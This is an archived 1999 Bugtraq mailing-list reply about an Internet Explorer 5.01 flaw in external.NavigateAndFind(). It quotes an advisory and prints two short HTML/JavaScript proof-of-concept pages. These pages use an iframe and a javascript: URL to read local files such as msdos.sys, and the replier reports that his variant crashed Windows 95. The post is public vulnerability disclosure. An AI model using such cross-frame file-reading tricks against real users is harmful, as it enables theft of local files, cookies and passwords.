Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: IE 5.01 vulnerabilities in external.NavigateAndFind()
From: limbo_14 () ZDNETONEBOX COM (Scott Morris)
Date: Thu, 23 Dec 1999 16:20:07 GMT


I altered the script to the following, and under Netscape 4.06, it caused
Win95B to reboot immediately.  I also tried it under IE4.0, and it loaded
the msdos.sys file to the text window, as expected.

<html>
<IFRAME NAME="I1" SRC="file://c:/msdos.sys"></IFRAME>
<SCRIPT>
function f()
{
window.external.NavigateAndFind("javascript:alert(document.body.innerText);","ll","I1");
}
setTimeout("f()",2000);
</SCRIPT>

IE 5.01 vulnerabilities in external.NavigateAndFind()

<--snipped
Internet Explorer 5.01 under Windows 95 and 5.0 under WinNT 4.0 (suppose
other versions are also vulnerable)
allows circumventing "Cross frame security policy" by using
external.NavigateAndFind().
This exposes the whole DOM of the target document.
This allows reading local text and HTML files and files from any host
(suppose reading files of any type is possible), getting cookies (that
is dangerous because may get passwords, etc.) and other sensitive
information.
It is also possible in some cases to read files behind firewall.
This vulnerability may be exploited using HTML email message or a
newsgroup posting.

Details:

window.external.NavigateAndFind() is used to search for strings in
specified URLs displaying the result in a specified frame.
The problem is it allows searching in "javascript:" URLs in a specified
frame.
In this case the code in the "javascript:" URL is executed in the
security context of the target frame
and the code has access to the document loaded in the target frame.
Examine the code below for more information.

The code is:
----------------------------------------------------------------------------------------
<IFRAME NAME="I1" SRC="file://c:/test.txt"></IFRAME>
<SCRIPT>
function f()
{
window.external.NavigateAndFind("javascript:alert(document.body.innerText);","ll","I1");
}
setTimeout("f()",2000);
</SCRIPT>
----------------------------------------------------------------------------------------

___________________________________________________________________
To get your own FREE ZDNet onebox - FREE voicemail, email, and fax,
all in one place - sign up today at http://www.zdnetonebox.com


  By Date           By Thread  

Current thread:
  • Re: IE 5.01 vulnerabilities in external.NavigateAndFind() Scott Morris (Dec 23)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]